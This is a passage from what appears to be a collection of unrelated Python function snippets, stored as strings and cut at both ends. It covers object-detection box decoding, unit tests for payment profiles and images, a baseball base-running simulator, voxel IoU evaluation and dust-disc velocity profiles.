output_[:,:,1,:].sigmoid_().add_(lin_y).div_(h) # Y center\n output_[:,:,2,:].exp_().mul_(anchor_w).div_(w) # Width\n output_[:,:,3,:].exp_().mul_(anchor_h).div_(h) # Height\n output_[:,:,4,:].sigmoid_() # Box score\n\n # Compute class_score\n if self.num_classes > 1:\n if torch.__version__.startswith('0.3'):\n cls_scores = torch.nn.functional.softmax(Variable(output_[:,:,5:,:], volatile=True), 2).data\n else:\n cls_scores = torch.nn.functional.softmax(output_[:,:,5:,:], 2)\n cls_max, cls_max_idx = torch.max(cls_scores, 2)\n cls_max.mul_(output_[:,:,4,:])\n else:\n cls_max = output_[:,:,4,:]\n cls_max_idx = torch.zeros_like(cls_max)\n\n # Save detection if conf*class_conf is higher than threshold\n\n if mode == 0:\n output_ = output_.cpu()\n cls_max = cls_max.cpu()\n cls_max_idx = cls_max_idx.cpu()\n boxes = []\n for b in range(batch):\n box_batch = []\n for a in range(self.num_anchors):\n for i in range(h*w):\n if cls_max[b,a,i] > self.conf_thresh:\n box_batch.append([\n output_[b,a,0,i],\n output_[b,a,1,i],\n output_[b,a,2,i],\n output_[b,a,3,i],\n cls_max[b,a,i],\n cls_max_idx[b,a,i]\n ])\n box_batch = torch.Tensor(box_batch)\n boxes.append(box_batch)\n elif mode == 1 or mode == 2:\n # Save detection if conf*class_conf is higher than threshold\n flags = cls_max > self.conf_thresh\n flat_flags = flags.view(-1)\n\n # number of potential detections per batch\n item_size = np.prod(flags.shape[1:])\n slices = [slice((item_size * i), (item_size * (i + 1))) for i in range(batch)]\n # number of detections per batch (prepended with a zero)\n n_dets = torch.stack([flat_flags[0].long() * 0] + [flat_flags[sl].long().sum() for sl in slices])\n # indices of splits between filtered detections\n filtered_split_idxs = torch.cumsum(n_dets, dim=0)\n\n # Do actual filtering of detections by confidence thresh\n flat_coords = output_.transpose(2, 3)[..., 0:4].clone().view(-1, 4)\n flat_class_max = cls_max.view(-1)\n flat_class_idx = cls_max_idx.view(-1)\n\n coords = flat_coords[flat_flags]\n scores = flat_class_max[flat_flags]\n cls_idxs = flat_class_idx[flat_flags]\n\n filtered_dets = torch.cat([coords, scores[:, None],\n cls_idxs[:, None].float()], dim=1)\n\n boxes2 = []\n for lx, rx in zip(filtered_split_idxs, filtered_split_idxs[1:]):\n batch_box = filtered_dets[lx:rx]\n boxes2.append(batch_box)\n\n if False:\n boxes3 = [torch.Tensor(box) for box in boxes]\n list(map(len, boxes2))\n list(map(len, boxes3))\n for b2, b3 in zip(boxes3, boxes2):\n assert np.all(b2.cpu() == b3.cpu())\n\n boxes = boxes2\n\n return boxes", "def test_create_profile(self):\n self.cim.create_profile(\n card_number=u\"42222222222\",\n expiration_date=u\"2010-04\",\n customer_id=u\"dialtone\"\n )\n\n def assert_other(message):\n assert 'creditCardNumber' not in message\n assert 'bankAccount' in message\n self.assert_other = assert_other\n try:\n self.cim.create_profile(\n customer_id=u\"dialtone\",\n profile_type=u\"bank\",\n name_on_account=u\"John Doe\",\n routing_number=u\"12345678\",\n account_number=u\"1234567890\"\n )\n finally:\n del self.assert_other\n\n self.cim.create_profile(\n card_number=u\"42222222222\",\n expiration_date=u\"2010-04\",\n customer_id=u\"dialtone\",\n ship_phone=u'415-415-4154',\n ship_first_name=u'valentino'\n )\n\n payment_profiles = [\n dict(card_number=u\"43333333333\",\n expiration_date=u\"2010-04\"),\n dict(profile_type=u\"bank\",\n name_on_account=u\"John Doeð\",\n routing_number=u\"12345678\",\n account_number=u\"1234567890\")\n ]\n\n def assert_other(message):\n assert 'John Doe' in message\n assert '43333333333' in message\n assert 'valentino' in message\n self.assert_other = assert_other\n try:\n self.cim.create_profile(\n customer_id=u\"dialtone\",\n payment_profiles=payment_profiles,\n ship_phone=u\"415-415-4154\",\n ship_first_name=u\"valentino\"\n )\n finally:\n del self.assert_other", "def test_get_cache(self):\r\n profile1 = self.profile_manager.get('testing')\r\n profile2 = self.profile_manager.get('testing')\r\n self.assertEqual(profile1, profile2)", "def test_profile_image_requested_field(self):\n self.register_get_user_response(self.user)\n cs_thread = make_minimal_cs_thread({\n \"id\": self.thread_id,\n \"course_id\": str(self.course.id),\n \"username\": self.user.username,\n \"user_id\": str(self.user.id),\n })\n self.register_get_thread_response(cs_thread)\n self.create_profile_image(self.user, get_profile_image_storage())\n response = self.client.get(self.url, {\"requested_fields\": \"profile_image\"})\n assert response.status_code == 200\n expected_profile_data = self.get_expected_user_profile(self.user.username)\n response_users = json.loads(response.content.decode('utf-8'))['users']\n assert expected_profile_data == response_users[self.user.username]", "def checkProfileEquality(self, profile1, profile2):\n if len(profile1) != len(profile2) or len(profile1[0]) != len(profile2[0]):\n return False\n for gram1 in profile1:\n contains = False\n for gram2 in profile2:\n if gram1 == gram2:\n contains = True\n break\n if contains == False:\n return False\n return True", "def test_nominal_case(self):\n\n image_filename, boxes = list(annotation.read(self.filename))\n self.assertEqual(image_filename, 'image.jpg')\n self.assertEqual(len(boxes), 2)\n width = 400\n height = 300\n b = boxes[0]\n self.assertEqual(b.xmin, 10 / width)\n self.assertEqual(b.ymin, 20 / height)\n self.assertEqual(b.xmax, 30 / width)\n self.assertEqual(b.ymax, 40 / height)", "def runTest(self):\n change = EtcProposalsChangeStub()\n controller = EtcProposalsControllerStub()\n changestatus = EtcProposalChangeStatus(change, controller)\n self.testbox.pack_start(changestatus, False, False, 1)\n gtk.main()\n self.failIf(self.Failed, 'Test failed.')", "def test_creation_profile_1():\n assert tuple_NT[0][0] == LIST_dict[0]['name'], \"Name is not getting stored properly\"", "def evaluate_detections(self, all_boxes, output_dir=None):\n raise NotImplementedError", "def test_default_box_simple() :\n kwargs = {\n 'image_size' : 160,\n 'steps' : [8, 16, 32],\n 'aspect_ratios' : [1],\n 'variance' : [0.1, 0.2],\n 'clip' : 1,\n }\n default_box = DefaultBox(**kwargs)\n boxes = default_box()\n assert torch.all(eq(\n default_box.feature_maps,\n tensor([20, 10, 5])\n ))\n assert default_box.anchors.dim() == 3\n \"\"\"\n 3 -> number of feature maps\n 2 -> n aspect ratio (+1)\n 2 -> width and height value\n \"\"\"\n assert default_box.anchors.size() == Size([3,2,2])\n assert boxes.dim() == 2\n \"\"\"\n (20*20+10*10+5*5)*2 -> number of feature maps (grids) * number of aspect ratios\n 2+2 -> cxywh\n \"\"\"\n assert boxes.size() == Size([(20*20+10*10+5*5)*2,2+2])\n kwargs = {\n 'image_size' : 160,\n 'steps' : [8, 16, 32],\n 'aspect_ratios' : [2, 3],\n 'variance' : [0.1, 0.2],\n 'clip' : 1,\n }\n default_box = DefaultBox(**kwargs)\n boxes = default_box()\n assert torch.all(eq(\n default_box.feature_maps,\n tensor([20, 10, 5])\n ))\n assert default_box.anchors.dim() == 3\n \"\"\"\n 3 -> number of feature maps\n 4 -> n aspect ratio * 2 (for 1/2 and 1/3)\n 2 -> width and height value\n \"\"\"\n assert default_box.anchors.size() == Size([3,4,2])\n assert boxes.dim() == 2\n \"\"\"\n (20*20+10*10+5*5)*4 -> number of feature maps (grids) * number of aspect ratios\n 2+2 -> cxywh\n \"\"\"\n assert boxes.size() == Size([(20*20+10*10+5*5)*4,2+2])", "def run_test_wait_for_sum_of_cubes():\n # -------------------------------------------------------------------------\n # TODO: 8. Implement this TEST function.\n # It TESTS the wait_for_sum_of_cubes function defined below.\n # Include at least ** 20 ** tests. (We supplied 18 tests for you.)\n # __\n # As usual, include both EXPECTED and ACTUAL results in your test\n # and compute the latter BY HAND (not by running your program).\n # -------------------------------------------------------------------------\n print()\n print(\"--------------------------------------------------\")\n print(\"Testing the wait_for_sum_of_cubes function:\")\n print(\"--------------------------------------------------\")\n\n format_string = \" wait_for_sum_of_cubes( {} )\"\n test_results = [0, 0] # Number of tests passed, failed.\n\n # Test 1:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 2\n print_expected_result_of_test([4.3], expected, test_results, format_string)\n actual = wait_for_sum_of_cubes(4.3)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 2:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 1\n print_expected_result_of_test([1], expected, test_results, format_string)\n actual = wait_for_sum_of_cubes(1)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 3:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 2\n print_expected_result_of_test([1.000000000001], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(1.000000000001)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 4:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 2\n print_expected_result_of_test([9], expected, test_results, format_string)\n actual = wait_for_sum_of_cubes(9)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 5:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 3\n print_expected_result_of_test([9.000000000001], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(9.000000000001)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 6:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 3\n print_expected_result_of_test([35.9999999999999], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(35.9999999999999)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 7:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 3\n print_expected_result_of_test([36], expected, test_results, format_string)\n actual = wait_for_sum_of_cubes(36)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 8:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 4\n print_expected_result_of_test([36.0000001], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(36.0000001)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 9:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 4\n print_expected_result_of_test([58], expected, test_results, format_string)\n actual = wait_for_sum_of_cubes(58)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 10:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 4\n print_expected_result_of_test([100], expected, test_results, format_string)\n actual = wait_for_sum_of_cubes(100)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 11:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 5\n print_expected_result_of_test([100.00000001], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(100.00000001)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 12:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 8\n print_expected_result_of_test([1000], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(1000)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 13:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 1\n print_expected_result_of_test([-4.2], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(-4.2)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 14:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 8\n print_expected_result_of_test([1296], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(1296)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 15:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 9\n print_expected_result_of_test([1296.00000001], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(1296.00000001)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 16:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 25\n print_expected_result_of_test([100000], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(100000)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 17:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 38\n print_expected_result_of_test([500000], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(500000)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # Test 18:\n print()\n print(\"TEST STARTED! Has it ended?\")\n expected = 251\n print_expected_result_of_test([1000000000], expected, test_results,\n format_string)\n actual = wait_for_sum_of_cubes(1000000000)\n print_actual_result_of_test(expected, actual, test_results)\n print(\"TEST ENDED!\")\n\n # -------------------------------------------------------------------------\n # TODO: 8 (continued):\n # PUT YOUR TEST ** IN THE SPACE BETWEEN ** the\n # print(\"TEST STARTED!\" ...) and print(\"TEST ENDED\") lines below.\n # __\n # *** Use wait_for_sum_of_cubes(30.33) as your test here.\n # Compute the expected answer BY HAND, as always.\n # -------------------------------------------------------------------------\n # Test 19:\n print()\n print(\"TEST STARTED! Has it ended?\")\n\n print(\"TEST ENDED!\")\n\n # -------------------------------------------------------------------------\n # TODO: 8 (continued):\n # PUT YOUR TEST ** IN THE SPACE BETWEEN ** the\n # print(\"TEST STARTED!\" ...) and print(\"TEST ENDED\") lines below.\n # -------------------------------------------------------------------------\n # Test 20:\n print()\n print(\"TEST STARTED! Has it ended?\")\n\n print(\"TEST ENDED!\")\n\n # SUMMARY of test results:\n print_summary_of_test_results(test_results)", "def evaluate_strategy_profile(self, yield_outcomes=False):\n if self.profile_queue:\n s = self.profile_queue.pop(0)\n if s not in self.active_strategy_profiles:\n self.active_strategy_profiles.append(s)\n game_outcome = self.G.observe_result(s)\n if yield_outcomes:\n yield s, game_outcome\n self.update_mean_and_count(s, game_outcome)", "def update(self, result):\n\n runs_scored = 0\n outs_recorded = 0\n\n if result == 'single':\n # Runners from 2b or 3b score first\n if self.occupied_2b and self.occupied_3b:\n self.occupied_2b = False\n self.occupied_3b = False\n runs_scored += 2\n elif self.occupied_2b or self.occupied_3b:\n self.occupied_2b = False\n self.occupied_3b = False\n runs_scored += 1\n # Runners from first advance\n if self.occupied_1b:\n self.occupied_2b = True\n # First base now occupied\n self.occupied_1b = True\n\n if result == 'double':\n # Runners from 2b or 3b score\n if self.occupied_2b and self.occupied_3b:\n self.occupied_2b = False\n self.occupied_3b = False\n runs_scored += 2\n elif self.occupied_2b or self.occupied_3b:\n self.occupied_2b = False\n self.occupied_3b = False\n runs_scored += 1\n # Runner on 1st (see notes)\n if self.occupied_1b:\n rand = random.uniform(0,1)\n if rand < 0.4:\n runs_scored +=1\n else:\n self.occupied_3b = True\n self.occupied_1b = False\n \n if result == 'triple':\n # Everyone on base scores\n number_bases_occupied = self.occupied_1b + self.occupied_2b + self.occupied_3b\n runs_scored += number_bases_occupied\n # New runner on 3b\n self.occupied_3b = True\n\n if result == 'home run':\n number_bases_occupied = self.occupied_1b + self.occupied_2b + self.occupied_3b\n runs_scored += number_bases_occupied + 1\n\n if result == 'foul out' or result == 'fly out' or result == 'out at 1st' or result == 'strike out':\n outs_recorded += 1\n\n if result == 'double play':\n # This is weird, since dps aren't always possible. See notes.\n \n if self.occupied_1b + self.occupied_2b + self.occupied_3b == 0:\n # If nobody on base, just a normal out\n outs_recorded +=1\n \n ## 1 existing Baserunner scenario\n elif self.occupied_1b and not self.occupied_2b and not self.occupied_3b:\n # If on first, outs at 1b and 2b\n self.occupied_1b = False\n outs_recorded += 2\n elif (not self.occupied_1b and self.occupied_2b and not self.occupied_3b):\n # If baserunner on second, no force outs, just add an out\n outs_recorded += 1\n elif (not self.occupied_1b and not self.occupied_2b and self.occupied_3b):\n # If baserunner on third, same\n outs_recorded += 1\n\n ## 2 existing Baserunner scenario\n elif self.occupied_1b and self.occupied_2b and not self.occupied_3b:\n # If on 1st and 2nd, outs at 3rd and 2nd\n self.occupied_1b = True\n self.occupied_2b = False\n outs_recorded += 2\n elif self.occupied_1b and not self.occupied_2b and self.occupied_3b:\n # If on 1st and 3nd, outs at 2rd and 1st\n self.occupied_1b = False\n outs_recorded += 2\n elif not self.occupied_1b and self.occupied_2b and self.occupied_3b: \n # If 2b and 3b occupied, only force out at 1b, so base/out doesn't change\n outs_recorded += 1\n\n ## 3 existing Baserunner scneario\n elif self.occupied_1b and self.occupied_2b and self.occupied_3b: \n # If bases loaded, outs at home and 3b. 2b and 1b stay occupied\n self.occupied_3b = False\n outs_recorded += 2\n\n\n if result == 'base on error':\n # Everyone advances\n if self.occupied_3b:\n runs_scored += 1\n self.occupied_3b = False\n if self.occupied_2b:\n self.occupied_3b = True\n self.occupied_2b = False\n if self.occupied_1b:\n self.occupied_2b = True\n self.occupied_1b = False\n self.occupied_1b = True\n\n\n if result == 'base on balls':\n if self.occupied_3b and self.occupied_2b and self.occupied_1b:\n runs_scored += 1\n if self.occupied_2b and self.occupied_1b:\n self.occupied_3b = True\n if self.occupied_1b:\n self.occupied_2b = True\n self.occupied_1b = True \n\n return runs_scored, outs_recorded", "def run():\n tests = [\n # [\n # [\"\", \"sumRange\", \"sumRange\", \"sumRange\", \"update\", \"sumRange\", \"sumRange\", \"sumRange\"],\n # [[1, 2, 3, 4, 5], [0, 2], [1, 2], [1, 3], [1, 3], [0, 2], [1, 2], [0, 1]]\n # ],\n [\n [\"NumArray\", \"sumRange\", \"update\", \"sumRange\"],\n [[-1], [0, 0], [0, 1], [0, 0]]\n ]\n ]\n\n results = [\n # [None, 3, 2, 5, None, 4, 2, 2],\n [None, -1, None, 1],\n\n ]\n for test, res in zip(tests, results):\n print('-----'*20)\n cmds, params = test\n cmds.pop(0)\n p = params.pop(0)\n res.pop(0)\n obj = BIT(p)\n for cmd, param, exp in zip(cmds, params, res):\n v = getattr(obj, cmd)(*param)\n print(obj)\n print(f'------\\n{cmd}, {param} --> {v} : {exp}')\n assert exp == v", "def test_resultingGoose_outside(self):\n goose = coordinate.Coordinate(5, 5)\n actual_result = rules.resultingGoose(types.GOOSE, goose)\n expected_result = types.GOOSE\n self.assertEqual(actual_result, expected_result)", "def test_output_ensure_output_for_property(profile_from_dataset):\n output = CheckOutput(profile=profile_from_dataset)\n\n output.ensure_output_for_property(\"PRES\")\n flags = output.get_output_flags_for_property(\"PRES\")\n\n assert flags is not None\n assert isinstance(flags, ma.MaskedArray)\n assert np.all(flags == ArgoQcFlag.GOOD.value)", "def runTest(self):\n false_change = EtcProposalsChangeStub(False)\n true_change = EtcProposalsChangeStub()\n true_type = EtcProposalChangeType(true_change)\n false_type = EtcProposalChangeType(false_change)\n self.testbox.pack_start(false_type, False, False, 1)\n self.testbox.pack_start(true_type, False, False, 1)\n gtk.main()\n self.failIf(self.Failed, 'Test failed.')", "def test_calculates_risk_points_with_one_house(self):\n\n self.calculates_risk_points_by_houses.execute(self.user, self.risk_profile)\n\n for house in self.risk_profile[\"home\"]:\n self.assertEquals(house[\"risk_points\"], 2)", "def run_evaluation(self, example):\n assert isinstance(example, dict)\n assert 'name' in example\n\n name = example['name']\n house_id, camera_id = pbrs_utils.parse_house_and_camera_ids_from_string(name)\n\n gt_bg, gt_objects = sorted(glob.glob(path.join(config.default_out_root, 'v9_gt_mesh/{}/{}/gt*.ply'.format(house_id, camera_id))))\n gt_depths = sorted(glob.glob(path.join(config.default_out_root, 'v9_gt_mesh/{}/{}/d*.ply'.format(house_id, camera_id))))\n assert len(gt_depths) == 5\n\n gt_overhead_fg = sorted(glob.glob(path.join(config.default_out_root, 'v9_gt_overhead_mesh/{}/{}/overhead_fg.ply'.format(house_id, camera_id))))\n assert len(gt_overhead_fg) == 1\n gt_overhead_fg = gt_overhead_fg[0]\n assert path.exists(gt_overhead_fg)\n\n pred_depths = sorted(glob.glob(path.join(config.default_out_root, 'v9_pred_depth_mesh/{}/{}/pred_*.ply'.format(house_id, camera_id))))\n assert len(pred_depths) == 5\n\n pred_overhead_fg = sorted(glob.glob(path.join(config.default_out_root, 'v9_pred_depth_mesh/{}/{}/overhead_fg_clipped.ply'.format(house_id, camera_id))))\n assert len(pred_overhead_fg) == 1\n pred_overhead_fg = pred_overhead_fg[0]\n\n print('gt_depths', gt_depths)\n print('gt_objects', gt_objects)\n print('pred_depths', pred_depths)\n\n voxel_related_data_out_basedir = '/mnt/ramdisk/voxels_data/tmp_{}'.format(name.replace('/', '_'))\n for fname in glob.glob(path.join(voxel_related_data_out_basedir, '*')):\n os.remove(fname)\n\n camera_filename = example['camera_filename']\n fv = convert_mesh_to_camcoord(gt_objects, camera_filename)\n gt_objects_camcoord = path.join(voxel_related_data_out_basedir, 'gt_objects_camcoord.off')\n io_utils.save_off(fv, gt_objects_camcoord)\n\n # vox_res = 64\n vox_res = 400\n vox_method_flags = '-pb'\n\n self.run_command('/home/daeyun/usr/bin/binvox {} -d {} -bb -5 -5 -10 5 5 0 {}'.format(vox_method_flags, vox_res, gt_objects_camcoord))\n gt_object_voxel_file = gt_objects_camcoord.replace('.off', '.binvox')\n convert_binvox_to_pcl(gt_object_voxel_file)\n # convert_binvox_to_mesh(gt_object_voxel_file)\n\n ret = {}\n\n # f3d voxelization\n f3d_pred = path.join(config.default_out_root_v8, 'factored3d_pred/{}/{}/codes_transformed_clipped.ply'.format(house_id, camera_id))\n assert path.isfile(f3d_pred), f3d_pred\n fv = convert_mesh_to_camcoord(f3d_pred, camera_filename)\n f3d_objects_camcoord = path.join(voxel_related_data_out_basedir, 'f3d_objects_camcoord.off')\n io_utils.save_off(fv, f3d_objects_camcoord)\n\n self.run_command('/home/daeyun/usr/bin/binvox {} -d {} -bb -5 -5 -10 5 5 0 {}'.format(vox_method_flags, vox_res, f3d_objects_camcoord))\n f3d_objects_voxel_file = f3d_objects_camcoord.replace('.off', '.binvox')\n convert_binvox_to_pcl(f3d_objects_voxel_file)\n # convert_binvox_to_mesh(f3d_objects_voxel_file)\n\n iou = binvox_iou(f3d_objects_voxel_file, gt_object_voxel_file)\n print('IoU_f3d', iou)\n ret['IoU_f3d'] = iou\n\n '''\n # depth overhead only\n depth_meshes_fv_list = [io_utils.read_mesh_assimp(pred_d) for pred_d in [pred_overhead_fg]]\n # depth_meshes_fv_list = [io_utils.read_mesh_assimp(pred_d) for pred_d in pred_depths[:4]]\n\n depth_meshes_merged = io_utils.merge_meshes(*depth_meshes_fv_list)\n fv = convert_mesh_to_camcoord(depth_meshes_merged, camera_filename)\n depth_objects_camcoord = path.join(voxel_related_data_out_basedir, 'depth_meshes_ovh_camcoord.off')\n io_utils.save_off(fv, depth_objects_camcoord)\n self.run_command('/home/daeyun/usr/bin/binvox {} -d {} -bb -5 -5 -10 5 5 0 {}'.format(vox_method_flags, vox_res, depth_objects_camcoord))\n depth_ovh_voxel_file = depth_objects_camcoord.replace('.off', '.binvox')\n convert_binvox_to_pcl(depth_ovh_voxel_file)\n convert_binvox_to_mesh(depth_ovh_voxel_file)\n iou = binvox_iou(depth_ovh_voxel_file, gt_object_voxel_file)\n print('IoU_overheadonly', iou)\n ret['IoU_overheadonly'] = iou\n '''\n\n # depth voxelization no overhead\n depth_meshes_fv_list = [io_utils.read_mesh_assimp(pred_d) for pred_d in pred_depths[:4]]\n # depth_meshes_fv_list = [io_utils.read_mesh_assimp(pred_d) for pred_d in pred_depths[:4]]\n\n depth_meshes_merged = io_utils.merge_meshes(*depth_meshes_fv_list)\n fv = convert_mesh_to_camcoord(depth_meshes_merged, camera_filename)\n depth_objects_camcoord = path.join(voxel_related_data_out_basedir, 'depth_meshes_frontal4_camcoord.off')\n io_utils.save_off(fv, depth_objects_camcoord)\n self.run_command('/home/daeyun/usr/bin/binvox {} -d {} -bb -5 -5 -10 5 5 0 {}'.format(vox_method_flags, vox_res, depth_objects_camcoord))\n depth_objects_voxel_file = depth_objects_camcoord.replace('.off', '.binvox')\n convert_binvox_to_pcl(depth_objects_voxel_file)\n # convert_binvox_to_mesh(depth_objects_voxel_file)\n\n iou = binvox_iou(depth_objects_voxel_file, gt_object_voxel_file)\n print('IoU_frontaldepthonly', iou)\n ret['IoU_frontaldepthonly'] = iou\n\n # depth voxelization\n depth_meshes_fv_list = [io_utils.read_mesh_assimp(pred_d) for pred_d in pred_depths[:4] + [pred_overhead_fg]]\n # depth_meshes_fv_list = [io_utils.read_mesh_assimp(pred_d) for pred_d in pred_depths[:4]]\n\n depth_meshes_merged = io_utils.merge_meshes(*depth_meshes_fv_list)\n fv = convert_mesh_to_camcoord(depth_meshes_merged, camera_filename)\n depth_objects_camcoord = path.join(voxel_related_data_out_basedir, 'depth_meshes_frontal4_and_ovh_camcoord.off')\n io_utils.save_off(fv, depth_objects_camcoord)\n self.run_command('/home/daeyun/usr/bin/binvox {} -d {} -bb -5 -5 -10 5 5 0 {}'.format(vox_method_flags, vox_res, depth_objects_camcoord))\n depth_objects_voxel_file = depth_objects_camcoord.replace('.off', '.binvox')\n convert_binvox_to_pcl(depth_objects_voxel_file)\n # convert_binvox_to_mesh(depth_objects_voxel_file)\n\n iou = binvox_iou(depth_objects_voxel_file, gt_object_voxel_file)\n print('IoU_alldepths', iou)\n ret['IoU_alldepths'] = iou\n\n return voxel_related_data_out_basedir, ret", "def calculate_profiles(\n snap: Snap,\n radius_min: Quantity,\n radius_max: Quantity,\n scale_height_fac: float,\n n_bins: int = 50,\n) -> Dict[str, List[Profile]]:\n print('Calculating profiles...')\n\n snap.add_quantities('disc')\n snap.set_gravitational_parameter(0)\n gamma = snap.properties['adiabatic_index']\n num_dust = snap.num_dust_species\n\n # Use particles in the midplane only\n # Choose particles such that they are within a factor of the gas scale height\n gas = snap.family('gas')\n prof = plonk.load_profile(snap=gas, cmin=radius_min, cmax=radius_max)\n scale_height = prof.to_function('scale_height')\n snap_midplane = snap[np.abs(snap['z']) < scale_height_fac * scale_height(snap['R'])]\n\n subsnaps = snap_midplane.subsnaps_as_dict()\n\n # Create radial profiles for the gas and each dust species\n cmin, cmax = radius_min, radius_max\n profs: Dict[str, List[Profile]] = {'gas': list(), 'dust': list()}\n profs['gas'] = [\n plonk.load_profile(subsnaps['gas'], cmin=cmin, cmax=cmax, n_bins=n_bins)\n ]\n for subsnap in subsnaps['dust']:\n profs['dust'].append(\n plonk.load_profile(subsnap, cmin=cmin, cmax=cmax, n_bins=n_bins)\n )\n\n p = profs['gas'][0]\n\n # velocity_pressure is (15) in Dipierro+2018\n p['velocity_pressure'] = np.gradient(p['pressure'], p['radius']) / (\n p['density'] * p['keplerian_frequency']\n )\n\n # shear_viscosity is between (16) an (17) in Dipierro+2018\n p['shear_viscosity'] = p['disc_viscosity'] * p['density']\n\n # velocity_visc is (16) in Dipierro+2018\n p['velocity_visc'] = np.gradient(\n p['shear_viscosity']\n * p['radius'] ** 3\n * np.gradient(p['keplerian_frequency'], p['radius']),\n p['radius'],\n ) / (\n p['radius']\n * p['density']\n * np.gradient(p['radius'] ** 2 * p['keplerian_frequency'], p['radius'])\n )\n\n for idx, prof_dust in enumerate(profs['dust']):\n p[f'midplane_dust_to_gas_{idx+1:03}'] = prof_dust['density'] / p['density']\n p[f'_midplane_stokes_number_{idx+1:03}'] = (\n np.sqrt(np.pi * gamma / 8)\n * snap.properties['grain_density'][idx]\n * snap.properties['grain_size'][idx]\n * p['keplerian_frequency']\n / (p['density'] * p['sound_speed'])\n )\n\n # lambda_0 and lambda_1 are (17) in Dipierro+2018\n l0 = np.zeros(len(p)) * plonk.units['dimensionless']\n l1 = np.zeros(len(p)) * plonk.units['dimensionless']\n for idx in range(num_dust):\n St = p[f'_midplane_stokes_number_{idx+1:03}']\n eps = p[f'midplane_dust_to_gas_{idx+1:03}']\n l0 = l0 + 1 / (1 + St ** 2) * eps\n l1 = l1 + St / (1 + St ** 2) * eps\n p['lambda_0'] = l0\n p['lambda_1'] = l1\n\n v_P = p['velocity_pressure']\n v_visc = p['velocity_visc']\n l0 = p['lambda_0']\n l1 = p['lambda_1']\n\n # velocity_radial_gas is (11) in Dipierro+2018\n p['gas_velocity_radial'] = (-l1 * v_P + (1 + l0) * v_visc) / (\n (1 + l0) ** 2 + l1 ** 2\n )\n\n # velocity_azimuthal_gas is (12) in Dipierro+2018\n p['gas_velocity_azimuthal'] = (\n 1 / 2 * (v_P * (1 + l0) + v_visc * l1) / ((1 + l0) ** 2 + l1 ** 2)\n )\n\n # velocity_radial_dust_i is (13) in Dipierro+2018\n # velocity_azimuthal_dust_i is (14) in Dipierro+2018\n for idx in range(num_dust):\n St = p[f'_midplane_stokes_number_{idx+1:03}']\n eps = p[f'midplane_dust_to_gas_{idx+1:03}']\n numerator_R = v_P * ((1 + l0) * St - l1) + v_visc * (1 + l0 + St * l1)\n numerator_phi = 0.5 * v_P * (1 + l0 + St * l1) - v_visc * ((1 + l0) * St - l1)\n denominator = ((1 + l0) ** 2 + l1 ** 2) * (1 + St ** 2)\n p[f'dust_velocity_radial_{idx+1:03}'] = numerator_R / denominator\n p[f'dust_velocity_azimuthal_{idx+1:03}'] = numerator_phi / denominator\n\n # Divide by |v_P| for comparison with Figure B1 in Dipierro+2018\n # \"Analytical\" solution\n v_R = p['gas_velocity_radial']\n p['gas_velocity_radial_analytical'] = v_R / np.abs(v_P)\n for idx in range(num_dust):\n v_R = p[f'dust_velocity_radial_{idx+1:03}']\n p[f'dust_velocity_radial_analytical_{idx+1:03}'] = v_R / np.abs(v_P)\n\n # \"Numerical\" solution\n v_R = p['velocity_radial_cylindrical']\n v_R_std = p['velocity_radial_cylindrical_std']\n p['velocity_radial_numerical'] = v_R / np.abs(v_P)\n p['velocity_radial_numerical_std'] = v_R_std / np.abs(v_P)\n for prof in profs['dust']:\n v_R = prof['velocity_radial_cylindrical']\n v_R_std = prof['velocity_radial_cylindrical_std']\n prof['velocity_radial_numerical'] = v_R / np.abs(v_P)\n prof['velocity_radial_numerical_std'] = v_R_std / np.abs(v_P)\n\n return profs", "def 